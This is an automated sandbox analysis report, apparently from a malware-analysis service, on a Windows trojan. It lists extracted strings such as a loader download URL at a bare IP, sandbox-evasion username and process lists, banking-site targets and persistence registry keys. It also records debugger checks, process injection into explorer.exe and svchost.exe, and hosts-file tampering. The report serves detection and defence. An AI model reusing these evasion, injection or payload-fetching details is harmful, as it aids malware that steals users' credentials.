Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Binary or memory string: invalid string positionstring too longwcscpymsvcrt.dllwcscatwcscmpwcsncpywcslenstrlenreallocfreewcsstrCloseHandlekernel32.dllCreateFileWFreeLibraryMoveFileWGetFileSizeExGetWindowsDirectoryAGetVolumeInformationAGetTickCountwsprintfWuser32.dllwsprintfAVirtualAllocReadFileSleepVirtualFreeSetFilePointerCreateDirectoryWFindFirstFileWFindNextFileWFindCloseCopyFileWWriteFileGetSystemDirectoryWExitProcessCreateProcessWShellExecuteWshell32.dllGetModuleFileNameWGetShortPathNameWGetEnvironmentVariableWInternetOpenWwininet.dllInternetOpenUrlWHttpQueryInfoAInternetReadFileInternetConnectWHttpOpenRequestWHttpSendRequestAInternetCloseHandleSHGetFolderPathWSHGetFolderPathASHGetKnownFolderPathPathIsURLWshlwapi.dllPathCombineWPathFindFileNameWRegDeleteKeyWAdvapi32.dllRegOpenKeyExARegSetValueExARegCloseKeyOpenProcessTokenGetTokenInformationAdjustTokenPrivilegesGetUserNameWLookupPrivilegeValueACoUninitializeole32.dllCoCreateInstanceCoInitializeMessageBoxAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3SeDebugPrivilegevector<T> too longReflectiveLoaderSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolderProcessHacker.exeprocexp.exeprocexp64.exeTOTALCMD.exex64dbg.exehttp://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeMicrosoftEdgeUpdatebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemRoot%\system32\svchost.exegeorgeAbbyDarrel JonesJohnJohn ZalinskyJohn DoeSHCtAGa3rmUV0U6479boGY8wjXNBzWALKERoxYT3lZggZMKt3wObOwwaWuh6PNjaakw.qsMdVVcp06AAy3mLfaNLLPJPQlavKFb0Lt07HV8BUt5BIsCZaFgxGd9fq4Iv8FrankAnnawdagutilityaccountWDAGUtilityAccounthal9thvirusmalwaresandboxsamplecurrentuseremilyhapubwshong leeit-adminjohnsonmillermilozsmicrosoftsand boxmaltestPaul JonesvmrayDiamotrix{%08lX%04lX%lu}ZBI\.exe.lnk\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHiddenServicesUnknown.firefox.exeexplorer.exe\MRT.exe\Mozilla\Firefox\Profiles\*release\drivers\etc\hostsvirustotal
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 5BB2.tmp.x.exe, 00000006.00000002.2532152528.0000000005D00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002A05000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000003.00000003.2679125905.0000000003542000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: {B268D441C1ED2974164258}.exe, 00000004.00000003.2165638351.00000243851AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\)pL
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe Binary or memory string: vmware-vmx.exe
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000003.00000003.2679125905.0000000003542000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000003.00000000.2105614725.0000000009B91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000003.00000000.2100969793.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: 5BB2.tmp.x.exe, 00000006.00000002.2519451420.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Found API chain indicative of debugger detection
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\explorer.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\svchost.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF943C40 IsDebuggerPresent,ExitProcess,GetModuleFileNameW,PathFindFileNameW,CreateMutexA,GetLastError,CloseHandle,ExitProcess,GetModuleHandleA,VirtualProtect,ExitProcess,ExitProcess, 0_2_00007FF6CF943C40
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF95D0B4 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00007FF6CF95D0B4
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\explorer.exe Code function: 3_2_08B721B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,OpenThread,SuspendThread,GetThreadContext,SetThreadContext,CloseHandle, 3_2_08B721B0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF941B30 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingA,CloseHandle,CloseHandle,VirtualFree, 0_2_00007FF6CF941B30
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9605F0 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,_write_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock, 0_2_00007FF6CF9605F0
Enables debug privileges
Source: C:\Windows\System32\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF956D84 SetUnhandledExceptionFilter, 0_2_00007FF6CF956D84
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF956BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6CF956BC8
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB6D84 SetUnhandledExceptionFilter, 4_2_00007FF6BCCB6D84
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCB6BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF6BCCB6BC8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA76D84 SetUnhandledExceptionFilter, 5_2_00007FF78FA76D84
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA76BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00007FF78FA76BC8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C6BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00007FF7A34C6BC8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C6D84 SetUnhandledExceptionFilter, 9_2_00007FF7A34C6D84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00007FF779EA9924
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E9C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_00007FF779E9C44C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E9BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00007FF779E9BBC0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E9C62C SetUnhandledExceptionFilter, 10_2_00007FF779E9C62C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF779EA9924
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E9C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF779E9C44C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E9BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF779E9BBC0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E9C62C SetUnhandledExceptionFilter, 12_2_00007FF779E9C62C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836CC28 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF8B836CC28
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83422DC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF8B83422DC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB65054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF8BFB65054
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB64A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF8BFB64A34
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB76810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF8BFB76810
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB75DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF8BFB75DF8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB769F8 SetUnhandledExceptionFilter, 12_2_00007FF8BFB769F8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB9D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF8BFB9D414
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F566D84 SetUnhandledExceptionFilter, 13_2_00007FF67F566D84
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F566BC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FF67F566BC8
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 7DF0.tmp.zx.exe.3.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 176.111.174.140 80 Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\explorer.exe Code function: 3_2_08B7E948 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free, 3_2_08B7E948
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9437F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 0_2_00007FF6CF9437F8
Source: C:\Windows\explorer.exe Code function: 3_2_08B7D180 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 3_2_08B7D180
Source: C:\Windows\explorer.exe Code function: 3_2_08B7CEB4 OpenProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle, 3_2_08B7CEB4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA37F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 4_2_00007FF6BCCA37F8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA637F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 5_2_00007FF78FA637F8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B37F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 9_2_00007FF7A34B37F8
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F5537F8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 13_2_00007FF67F5537F8
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\svchost.exe Thread created: C:\Windows\explorer.exe EIP: 335C698 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\svchost.exe Memory written: C:\Windows\explorer.exe base: 3350000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\svchost.exe Memory written: PID: 1028 base: 3350000 value: 4D Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Thread register set: target process: 412 Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Thread register set: target process: 6760 Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Thread register set: target process: 3876 Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Thread register set: target process: 4284
Modifies the hosts file
Source: C:\Windows\System32\svchost.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Memory written: C:\Windows\System32\svchost.exe base: FD73AF1010 Jump to behavior
Source: C:\Windows\System32\svchost.exe Memory written: C:\Windows\explorer.exe base: 3350000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Memory written: C:\Windows\System32\svchost.exe base: F1BC0BF010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Memory written: C:\Windows\System32\svchost.exe base: AD4FB3F010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Memory written: C:\Windows\System32\svchost.exe base: 7F5728D010
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
